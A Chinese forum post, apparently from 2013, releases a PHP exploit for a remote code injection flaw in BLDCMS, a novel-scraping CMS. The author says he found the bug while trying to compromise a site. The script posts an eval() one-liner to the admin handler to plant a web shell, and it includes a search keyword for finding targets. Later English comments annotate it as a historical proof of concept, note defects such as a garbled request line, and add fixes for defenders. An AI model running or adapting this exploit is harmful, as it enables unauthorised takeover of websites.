之前想搞一个黑阔站，发现旁站有一个站用了 BLDCMS，我就下载看了，找到了一个 getshell 漏洞。

话说昨晚晴天小铸在 90sec 发现有人把这个 getshell 漏洞的分析发出来了，擦，居然被人先发了。

既然都有人发了，我就把我之前写好的 EXP 放出来吧（注意：利用条件是目标 magic_quotes_gpc=Off，见脚本横幅）。
<?php
// Historical proof-of-concept (its own banner dates it 2013-03-21) for a
// "getshell" (remote PHP code injection) bug in BLDCMS, a PHP novel-scraper CMS.
// Reconstructed from a forum paste: anti-copy noise, line-number gutters and the
// HTML-comment mangling of the PHP tags were stripped, and the forum rendering
// artifact `emptyempty(` was restored to `empty(`. Everything else is left as
// posted, including the defects listed below.
//
// What the code visibly does: it sends one HTTP POST to
// /admin/chuli.php?action=a_1 whose `sqlite` form field carries a PHP one-liner
// (`';eval($_POST["<pass>"]);'`), then prints <url>/<dir>/conn/config/normal2.php
// as the location of the resulting web shell. The inference (not provable from
// this file) is that the handler writes the posted settings into that PHP file
// unescaped, so the single quotes in the payload break out of a string literal;
// that is why the banner requires magic_quotes_gpc=Off. Whether /admin/chuli.php
// enforces authentication is not visible here.
//
// Review notes, deliberately NOT fixed so this stays a faithful record:
//  * The request line reads `" OST ..."`; almost certainly a garbled `POST` from
//    the paste. As written the request is not valid HTTP.
//  * $dir is read from argv but never used in the request path, which is
//    hard-coded to /admin/chuli.php; it appears only in the final echo.
//  * The HTTP response is read and discarded; "success" is printed regardless
//    of what the server returned.
//  * $pass is spliced into the payload without escaping; a value containing
//    `"` or `'` corrupts the injected PHP.
//  * Port 80 is hard-coded; $errno/$errstr are captured but never reported.
// For defenders: never write request parameters into executable PHP files;
// store configuration as data (e.g. JSON or var_export() output) and
// authenticate the admin handler. Use only against systems you are authorized
// to test.
echo "-------------------------------------------------------------------

------------\r\n BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP

(GPC=Off)\r\n Vulnerability discovery&Code by 数据流@wooyun

QQ:981009941\r\n 2013.3.21\r\n


用法:php.exe EXP.php www.baidu.com /cms/ pass(一句话密码

)\r\n 搜索关键字:\"开发者: 白老大小说\"\r\n-----------

--------------------------------------------------------------------\r\n";
$url=$argv[1];   // target host, no scheme; used both as fsockopen() target and Host: header
$dir=$argv[2];   // CMS web-root path; only echoed at the end, never sent (see notes)
$pass=$argv[3];  // name of the $_POST key the dropped eval() shell will read
// Builds `';eval($_POST["<pass>"]);'`. The leading and trailing single quotes
// are the string-literal break-out; the `;` terminates the statement the
// value is presumably spliced into.
$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';
if (empty($pass)||empty($url))   // posted as `emptyempty(`, a forum rendering artifact
{exit("请输入参数");}            // "please supply the arguments"
else
{
    // Form body. The other fields look like the minimum the handler expects;
    // the injection rides on `sqlite`. Nothing here is URL-encoded.
    $fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$eval;
    $length = strlen($fuckdata);
    // Sends the request over a raw socket and prints where the shell should be.
    // `global` below rebinds $url and $pass to the script globals, so the two
    // parameters are effectively ignored (they carry the same values anyway).
    function getshell($url,$pass)
    {
        global $url,$dir,$pass,$eval,$length,$fuckdata;
        $header = " OST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";   // sic: garbled "POST" in the paste; left as posted
        $header .= "Content-Type: application/x-www-form-urlencoded\r\n";
        $header .= "User-Agent: MSIE\r\n";
        $header .= "Host:".$url."\r\n";
        $header .= "Content-Length: ".$length."\r\n";   // $length is strlen($fuckdata), computed above
        $header .= "Connection: Close\r\n";
        $header .="\r\n";                                // end of headers
        $header .= $fuckdata."\r\n\r\n";                 // body, plus trailing CRLFs not counted in Content-Length
        $fp = fsockopen($url, 80,$errno,$errstr,15);     // plain TCP, port 80, 15 s connect timeout
        if (!$fp)
        {
            exit ("利用失败:请检查指定目标是否能正常打开");   // "exploit failed: check that the target is reachable"
        }
        else{ if (!fputs($fp,$header))
        {exit ("利用失败");}                               // "exploit failed"
        else
        {
            // Drain the response so the server can finish; nothing is inspected.
            $receive = '';
            while (!feof($fp)) {
                $receive .= @fgets($fp, 1000);
            }
            @fclose($fp);
            // Reports the expected shell path and password unconditionally.
            // "(if connecting fails, check whether the target has GPC=off)"
            echo "$url/$dir/conn/config/normal2.php pass pass(如连接失败 请检查目标

GPC是否=off)";
        }}
    }
}
getshell($url,$pass);
?>
by 数据流